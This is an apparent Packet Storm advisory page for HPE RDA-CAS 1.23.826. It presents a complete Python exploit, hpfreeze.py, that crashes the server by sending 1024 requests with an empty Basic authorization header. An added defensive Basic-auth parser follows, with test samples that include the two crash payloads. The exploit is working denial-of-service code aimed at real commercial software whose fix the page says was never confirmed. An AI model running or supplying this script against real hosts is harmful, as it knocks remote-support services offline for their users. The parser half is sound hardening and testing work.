HPE RDA-CAS 1.23.826 Denial Of Service

Published 23 Jun 2021 | Reported by Jeremy Brown | Type: packetstorm | Source: packetstormsecurity.com


Code
```python
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# hpfreeze.py
#
# HPE Remote Device Access Unauthenticated Denial of Service
#
# Jeremy Brown [jbrown3264/gmail]
# June 2021
#
# "Designed for the enterprise, HPE RDA (Remote Device Access) provides integrated remote
# connectivity for support automation, device telemetry and remote service delivery."
#
# More info: https://midway.ext.hpe.com
#
# rda-cas web server could not gracefully handle a blank or malformed BASIC auth string.
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x00007f4693362a5c in rda::base64_decode(std::string const&) () from /lib/librda.so.1
#
# Typical NULL ptr deref. It will automatically restart itself after handling one
# of these malformed requests, but quickly sending many of them will make the server
# give up on recovery and become unavailable to users. '=' instead of nothing for an
# auth string will also make it crash in a different parsing routine. The server can
# be configured at setup to listen on either localhost or the network interface.
#
# > ./hpfreeze.py rdacas-host
# ;p;P;p;P;p;P;p;P;p;P;p;P
#
# (If users have the web UI open, they may see "Connection to the RDA-CAS has been lost")
#
# Tested
# - RDA-CAS Version: 1.23.826
# -- rda-cas_1.23-826+deb10_amd64.deb
#
# Fix
# - "the issue will be remediated in an imminent release" with no further reply
#

import sys
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# The RDA-CAS web UI uses a self-signed certificate; suppress the TLS warnings.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

DEFAULT_PORT = 8082
HOW_MANY_TIMES = 1024


class HPFreeze(object):
    def __init__(self, args):
        self.target = args.target

    def run(self):
        target = "https://" + self.target + ':' + str(DEFAULT_PORT)

        session = requests.Session()
        session.verify = False

        # rocket science: a "Basic" scheme with no credential string at all
        headers = {'Authorization': "Basic"}

        # Each request crashes the worker; sending many in a row exhausts its
        # auto-restart and leaves the server unavailable.
        for i in range(HOW_MANY_TIMES):
            try:
                resp = session.post(target + "/", headers=headers)
            except Exception as error:
                # A dropped connection means the server process died on this request
                if('RemoteDisconnected' in str(error)):
                    print(";p;P", end='')
        print()

        return 0


def arg_parse():
    parser = argparse.ArgumentParser()

    parser.add_argument("target",
                        type=str,
                        help="HPE RDA host")

    args = parser.parse_args()

    return args


def main():
    args = arg_parse()

    hpf = HPFreeze(args)

    result = hpf.run()

    if(result > 0):
        sys.exit(-1)


if(__name__ == '__main__'):
    main()
```
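The crash described in the header comments is a server-side parsing failure: a `Basic` scheme with an empty credential, or a bare `=`, reaches the base64 decoder and dereferences a NULL pointer. As an added example (not code from the advisory or from HPE's rda-cas), the parser below shows the checks a Basic auth handler needs so that those two inputs, and other malformed values, are rejected before any decoding happens. Function names, the classification buckets and the sample header list are constructed for illustration.

```python
import base64
import binascii
import re
from collections import Counter
from typing import Dict, Iterable, Optional, Tuple

# Example code added to this page; not part of rda-cas or the advisory above.
# Accepts "Basic" followed by exactly one token68 credential (RFC 7617).
_BASIC_RE = re.compile(r"^\s*Basic(?:\s+(?P<cred>\S+))?\s*$", re.IGNORECASE)
# Strict base64 alphabet with at most two padding characters.
_B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_basic_auth(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Return (username, password) or None for a missing/malformed header.

    Every failure path returns None instead of raising, so a bare
    "Authorization: Basic" or "Authorization: Basic =" (the two inputs the
    advisory says crash rda-cas) is rejected before any decoder is called.
    """
    if header is None:
        return None
    match = _BASIC_RE.match(header)
    if match is None:
        return None                      # not a Basic scheme at all
    cred = match.group("cred")
    if not cred:
        return None                      # "Basic" with no credential
    # Length must be a multiple of 4 and characters must be valid base64;
    # this rejects "=" on its own and odd-length junk before decoding.
    if len(cred) % 4 != 0 or not _B64_RE.fullmatch(cred):
        return None
    try:
        raw = base64.b64decode(cred, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    user, sep, password = text.partition(":")   # password may contain ':'
    if not sep:
        return None                      # decoded, but not user:pass
    return user, password


def classify_auth_header(header: Optional[str]) -> str:
    """Bucket a header for logging/rate limiting: absent, unsupported, malformed, ok."""
    if header is None or not header.strip():
        return "absent"
    if not header.lstrip().lower().startswith("basic"):
        return "unsupported"             # some other scheme, e.g. Bearer
    return "ok" if parse_basic_auth(header) is not None else "malformed"


def count_auth_outcomes(headers: Iterable[Optional[str]]) -> Dict[str, int]:
    """Tally classifications over a stream of Authorization header values."""
    return dict(Counter(classify_auth_header(h) for h in headers))


# Constructed sample: the advisory's two payloads plus well-formed and junk values.
SAMPLE_HEADERS = [
    "Basic",                         # hpfreeze.py payload
    "Basic =",                       # second crash case from the advisory
    "Basic YWRtaW46czNjcmV0",        # admin:s3cret
    "Basic YTpiOmM=",                # a:b:c -> user "a", password "b:c"
    "Basic !!!!",                    # non-base64 characters
    "Basic YWRtaW4=",                # "admin" without a colon
    "Bearer abc.def.ghi",            # wrong scheme
    None,                            # no Authorization header at all
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(f"{h!r:32} -> {classify_auth_header(h)} {parse_basic_auth(h)}")
    print(count_auth_outcomes(SAMPLE_HEADERS))
```

The explicit length and alphabet checks run before `base64.b64decode` on purpose: `validate=True` only enforces the alphabet, and how a lone `=` is handled differs between Python versions, so the parser should not rely on the decoder to reject degenerate input. The `classify_auth_header` bucket is what you would feed into a per-source counter so that a burst of `malformed` values from one client is throttled rather than processed 1024 times.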
